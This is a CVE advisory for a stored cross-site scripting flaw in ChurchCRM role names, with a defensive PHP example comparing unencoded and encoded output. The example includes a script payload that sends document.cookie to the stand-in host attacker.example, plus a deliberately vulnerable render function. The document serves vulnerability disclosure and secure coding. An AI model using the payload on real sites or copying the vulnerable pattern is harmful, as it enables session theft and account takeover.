
Description

ChurchCRM is an open-source church management system. A stored cross-site scripting (XSS) vulnerability exists in ChurchCRM versions 6.4.0 and earlier that allows a low-privilege user holding the "Manage Groups" permission to inject persistent JavaScript into a group role name. The payload is saved to the database unsanitized and is rendered without output encoding, so it executes in the browser of any user (administrators included) who views a page that displays that role, such as GroupView.php or PersonView.php. Because the script runs in the victim's authenticated session, this enables session hijacking and account takeover. At the time of publication, no patched version was known to be available.
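The defect class described above, as an added PHP illustration that is not ChurchCRM code: the markup, function names and the sample role name are assumptions for the example, and the real GroupView.php / PersonView.php templates are not reproduced. It shows the vulnerable pattern (a stored value concatenated straight into HTML) beside the hardened pattern (encoding for the HTML text and attribute contexts at output time), plus a small check that confirms no raw markup survives.

```php
<?php
// Added example, not ChurchCRM project code. Names and markup are assumed.

// Constructed sample: a role name that a "Manage Groups" user could save.
// The stored value is attacker-controlled; the store itself is not the bug,
// the unencoded render is.
$sampleRoleName = 'Leader<script>fetch("https://attacker.example/?c="+document.cookie)</script>';

// Vulnerable pattern: the persisted value is interpolated into the page as-is.
// The browser parses the <script> element and runs it for every viewer of the
// group or person page, with that viewer's session cookies and privileges.
function renderRoleVulnerable(string $roleName): string
{
    return '<td class="role-name">' . $roleName . '</td>';
}

// Hardened pattern for HTML text context: encode at the point of output.
// ENT_QUOTES encodes both quote characters, ENT_SUBSTITUTE replaces invalid
// byte sequences instead of returning an empty string, and the charset must
// match the page's declared encoding so multibyte tricks cannot bypass it.
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderRoleSafe(string $roleName): string
{
    return '<td class="role-name">' . escapeHtml($roleName) . '</td>';
}

// Same value placed inside an attribute (for example a title or data-* attribute)
// needs the same encoding AND a quoted attribute; an unquoted attribute can be
// broken out of with a space even when < and > are encoded.
function renderRoleAttributeSafe(string $roleName): string
{
    return '<span title="' . escapeHtml($roleName) . '">role</span>';
}

// Self-check used during review: after encoding, the only angle brackets in the
// fragment should be the ones the template itself emitted. Here we strip the
// known template tags and assert nothing else opens a tag.
function fragmentIsInert(string $fragment, array $templateTags): bool
{
    $stripped = str_replace($templateTags, '', $fragment);
    return strpos($stripped, '<') === false && strpos($stripped, '>') === false;
}

$templateTags = ['<td class="role-name">', '</td>', '<span title="', '">role</span>'];

echo "vulnerable: ", renderRoleVulnerable($sampleRoleName), PHP_EOL;
echo "inert?      ", var_export(fragmentIsInert(renderRoleVulnerable($sampleRoleName), $templateTags), true), PHP_EOL;

echo "hardened:   ", renderRoleSafe($sampleRoleName), PHP_EOL;
echo "inert?      ", var_export(fragmentIsInert(renderRoleSafe($sampleRoleName), $templateTags), true), PHP_EOL;

echo "attribute:  ", renderRoleAttributeSafe($sampleRoleName), PHP_EOL;
echo "inert?      ", var_export(fragmentIsInert(renderRoleAttributeSafe($sampleRoleName), $templateTags), true), PHP_EOL;
```

Output encoding is the fix for this CWE-79 instance because the same stored string is rendered in more than one page; validating or length-limiting role names on the write path is a reasonable defence in depth, but it does not replace context-aware encoding at every output site. Marking the session cookie HttpOnly limits cookie theft via document.cookie but does not stop an injected script from issuing authenticated requests on the victim's behalf, so it is a mitigation, not a fix.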

State: PUBLISHED | Reserved: 2025-12-12 | Published: 2025-12-17 | Updated: 2025-12-18 | Assigner: GitHub_M




CRITICAL: 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L)

Problem types

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Product status

<= 6.4.0: affected

References

github.com/...RM/CRM/security/advisories/GHSA-j9gv-26c7-3qrh exploit

github.com/...RM/CRM/security/advisories/GHSA-j9gv-26c7-3qrh

cve.org (CVE-2025-67876)

nvd.nist.gov (CVE-2025-67876)


Data based on CVE®. Copyright © 1999-2025, The MITRE Corporation. All rights reserved.